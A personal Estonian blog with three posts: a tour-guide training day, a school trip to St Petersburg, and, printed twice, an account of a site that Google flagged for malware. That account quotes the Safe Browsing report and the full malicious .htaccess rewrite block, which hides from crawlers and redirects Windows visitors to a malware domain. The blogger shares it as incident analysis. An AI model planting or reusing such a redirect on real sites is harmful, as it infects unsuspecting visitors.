Saturday, April 14, 2012
Koolitus
Täna oli siis esimene päev giidide koolitusest, millest plaan osa võtta. Koolitus oli huvitav ja minu arvates on taoline ettevõtmine ainult tervitatav nii kohalikus kui riiklikus mastaabis. Olen näinud mitmeid giide tegemas oma tööd ja siiani on olnud arvamus nende tööst kui rahuldava ettevalmistusega päevatööst. Kuuldes aga nüüd, et giid valmistub ette ühe ekskursiooni jaoks kuni 2 kuud, siis praegu hindaks nende tööd ainult kasinaks. Võib-olla on tegemist pedagoogilise kretinismusega aga mulje on jäänud siiani, et tädid on võetud kuskilt koolimaja koridorist või ülikoolist välja langenud esimese kursuse tudengid, kes on suveks tööd otsimas. Loodan, et üldine tase paraneb läbi selliste koolituste ja toob eestisse sisse rohkem uudishimulikke külalisi :)
Tuesday, April 10, 2012
Veebirünnakud netis
6. aprillil juhtus siis selline asi, et üks kena veebileht pandi google poolt kinni. Lehte uuesti aktiivseks tegemiseks oli aga vaja tuvastada nii mõndagi. Tüüpilised lahendused, nagu failide muutmiste kuupäeva analüüs, andmebaasi muutmiste analüüs, lehe source ja css-i lugemine ei andnud soovitud tulemust. TUlemus oli ikka selline:
-------------
Safe Browsing
Diagnostic page for aaa.eee.iii.oo
What is the current listing status for aaa.eee.iii.oo?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-04-09, and the last time suspicious content was found on this site was on 2012-04-09.
Malicious software is hosted on 1 domain(s), including vicandbarbs.net/.
This site was hosted on 1 network(s) including AS49604 (server).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, aaa.eee.iii.oo did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
-------------
Edasi uurides selgus, et FTP logis oli veebruari kuus auk ja .htaccess faile oli "uuendatud"
Fail sisust näidis:
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER}
^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|
yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|go
to\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).
*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndicati
on).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatc
her).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\ship
top).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*
$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrai
ns).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_Power
PC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProdu
cts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).
*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60)
.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout
).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator
).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x
).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*
$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME}
!.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*Ghv.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$
http://%{REMOTE_PORT}.vicandbarbs.net/url?sa=N&source=web&cd=38&ved=0JIPpb3p
x&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25cse67K4q28rI2PxlAy95i1pw==&usg=
TK5lMYKAuR6UJAfGoXSYHe&sig2=QimcYgrymLdv8rU3AheLQp
[R=302,L,CO=Ghv:50:%{HTTP_HOST}:10919:/:0:HttpOnly]
Robot, kes oli seda teinud oli ca 2 min jooksul iga 5 sek tagant lisanud uue faili ja seejärel logi kustutanud. Kusjuures see tegevus oli toimunud veebriaris ja probleem ilmnes 2 kuud hiljem.
-------------
Safe Browsing
Diagnostic page for aaa.eee.iii.oo
What is the current listing status for aaa.eee.iii.oo?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-04-09, and the last time suspicious content was found on this site was on 2012-04-09.
Malicious software is hosted on 1 domain(s), including vicandbarbs.net/.
This site was hosted on 1 network(s) including AS49604 (server).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, aaa.eee.iii.oo did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
-------------
Edasi uurides selgus, et FTP logis oli veebruari kuus auk ja .htaccess faile oli "uuendatud"
Fail sisust näidis:
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER}
^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|
yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|go
to\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).
*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndicati
on).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatc
her).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\ship
top).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*
$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrai
ns).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_Power
PC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProdu
cts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$
[NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).
*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60)
.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout
).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator
).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x
).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*
$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}
!^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME}
!.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*Ghv.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$
http://%{REMOTE_PORT}.vicandbarbs.net/url?sa=N&source=web&cd=38&ved=0JIPpb3p
x&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25cse67K4q28rI2PxlAy95i1pw==&usg=
TK5lMYKAuR6UJAfGoXSYHe&sig2=QimcYgrymLdv8rU3AheLQp
[R=302,L,CO=Ghv:50:%{HTTP_HOST}:10919:/:0:HttpOnly]
Robot, kes oli seda teinud oli ca 2 min jooksul iga 5 sek tagant lisanud uue faili ja seejärel logi kustutanud. Kusjuures see tegevus oli toimunud veebriaris ja probleem ilmnes 2 kuud hiljem.
Reisimisest
Vahepeal on saanud reisitud Hollandis ja Venemaal (täpsemalt õpilastega peterburgis), kuid see viimane ettevõtmine oli päris omapärane. 3 neiut said trahvi liigse alkoholi tarvitamise pärast ja päevasel linnaekskursioonil polnud kedagi, kes sooviks vaadata ringi. Tund enne laeva tagasi minekut (vaba aja lõppu linnas) olid kõik juba pussis ja magasid oma kassiahastust välja. Üldiselt võib aga reisi korda läinuks lugeda, sest kõik kes läksid, jõudsid ka tagasi :)
Subscribe to:
Posts (Atom)